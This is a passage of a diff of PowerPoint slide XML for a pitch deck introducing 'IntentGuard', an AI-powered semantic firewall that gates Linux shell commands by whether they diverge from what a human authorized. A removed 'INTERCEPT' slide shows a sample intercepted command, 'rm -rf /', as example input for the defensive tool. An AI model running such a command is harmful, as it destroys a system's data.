+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF08D53-C22B-4EB4-B59D-94B42A14DB94}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="4500000">
+              <a:off x="2046780" y="3040492"/>
+              <a:ext cx="2579322" cy="2579322"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:noFill/>
+            <a:ln w="31750">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="20000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="20000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="39" name="Oval 38">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1950868D-F005-4C1A-A79B-D069B99479A0}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="4500000">
+              <a:off x="2224640" y="3193975"/>
+              <a:ext cx="2243193" cy="2243193"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:noFill/>
+            <a:ln w="31750">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="10000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="10000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+      </p:grpSp>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -8599,7 +9453,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="457200"/>
+            <a:off x="739987" y="474134"/>
             <a:ext cx="7680960" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -8658,19 +9512,31 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
+              <a:rPr dirty="0"/>
               <a:t>The question isn't</a:t>
             </a:r>
-            <a:br/>
-            <a:r>
+            <a:br>
+              <a:rPr dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr dirty="0"/>
               <a:t>"is this command allowed?"</a:t>
             </a:r>
-            <a:br/>
-            <a:br/>
-            <a:r>
+            <a:br>
+              <a:rPr dirty="0"/>
+            </a:br>
+            <a:br>
+              <a:rPr dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr dirty="0"/>
               <a:t>It's "does this command diverge</a:t>
             </a:r>
-            <a:br/>
-            <a:r>
+            <a:br>
+              <a:rPr dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr dirty="0"/>
               <a:t>from what the human authorized?"</a:t>
             </a:r>
           </a:p>
@@ -8748,7 +9614,7 @@
     <p:bg>
       <p:bgPr>
         <a:solidFill>
-          <a:srgbClr val="141428"/>
+          <a:schemeClr val="bg1"/>
         </a:solidFill>
         <a:effectLst/>
       </p:bgPr>
@@ -8769,69 +9635,50 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="274320"/>
-            <a:ext cx="7772400" cy="640080"/>
+          <p:cNvPr id="7" name="Rectangle 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr bwMode="white">
+          <a:xfrm>
+            <a:off x="1143" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
           <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="2600" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>INTRODUCING: IntentGuard</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Rectangle 2"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="868680"/>
-            <a:ext cx="1828800" cy="38100"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="00D4AA"/>
-          </a:solidFill>
           <a:ln>
             <a:noFill/>
           </a:ln>
         </p:spPr>
         <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
           </a:lnRef>
-          <a:fillRef idx="3">
+          <a:fillRef idx="1">
             <a:schemeClr val="accent1"/>
           </a:fillRef>
-          <a:effectRef idx="2">
+          <a:effectRef idx="0">
             <a:schemeClr val="accent1"/>
           </a:effectRef>
           <a:fontRef idx="minor">
@@ -8840,368 +9687,144 @@
         </p:style>
         <p:txBody>
           <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
+          <a:lstStyle>
+            <a:defPPr>
+              <a:defRPr lang="en-US"/>
+            </a:defPPr>
+            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
           <a:p>
             <a:pPr algn="ctr"/>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4566DB-68E2-1706-BF9E-560256BAC2CB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1051560"/>
-            <a:ext cx="8046720" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1700" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>AI-powered semantic firewall for the Linux command layer</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1554480"/>
-            <a:ext cx="8046720" cy="1877437"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Pre-execution blocking gate — Shell</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> h</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>ook on Unix domain socket</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>4-component divergence scoring — Sequence</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> s</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>urprise, Context</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> mi</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>smatch, Semantic</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>nconsistency, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>	</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Behavioral</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>eviation</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>All inference local — Gemini, zero data leaves Indian networks</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Deterministic scoring — same inputs always produce same composite</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>2-second decision budget with graceful LLM degradation</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="600"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>→  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>11 Indian-language explainability —</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t>Tamil,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> Kannada, Hindi,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1300" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:rPr>
-              <a:t> Bengali, Telugu...</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:srcRect r="2649"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="20" y="961"/>
+            <a:ext cx="9143980" cy="5142539"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3991862435"/>
+      </p:ext>
+    </p:extLst>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
@@ -9265,7 +9888,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>HOW IT WORKS</a:t>
+              <a:t>INTRODUCING: IntentGuard</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -9323,7 +9946,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="548640" y="1051560"/>
-            <a:ext cx="2743200" cy="274320"/>
+            <a:ext cx="8046720" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9337,7 +9960,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1300" b="1">
+              <a:defRPr sz="1700" b="0">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
@@ -9345,125 +9968,22 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>1. INTERCEPT</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1371600"/>
-            <a:ext cx="3840480" cy="914400"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="1E1E2E"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="127000" tIns="76200" rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:spcBef>
-                <a:spcPts val="100"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
-              </a:rPr>
-              <a:t>{"commandText": "rm -rf /",</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="100"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
-              </a:rPr>
-              <a:t> "userId": "rachit",</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="100"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
-              </a:rPr>
-              <a:t> "actorType": "HUMAN",</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcBef>
-                <a:spcPts val="100"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
-              </a:rPr>
-              <a:t> "inputOrigin": "TYPED"}</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
+              <a:rPr dirty="0"/>
+              <a:t>AI-powered semantic firewall for the Linux command layer</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="TextBox 4"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="2468880"/>
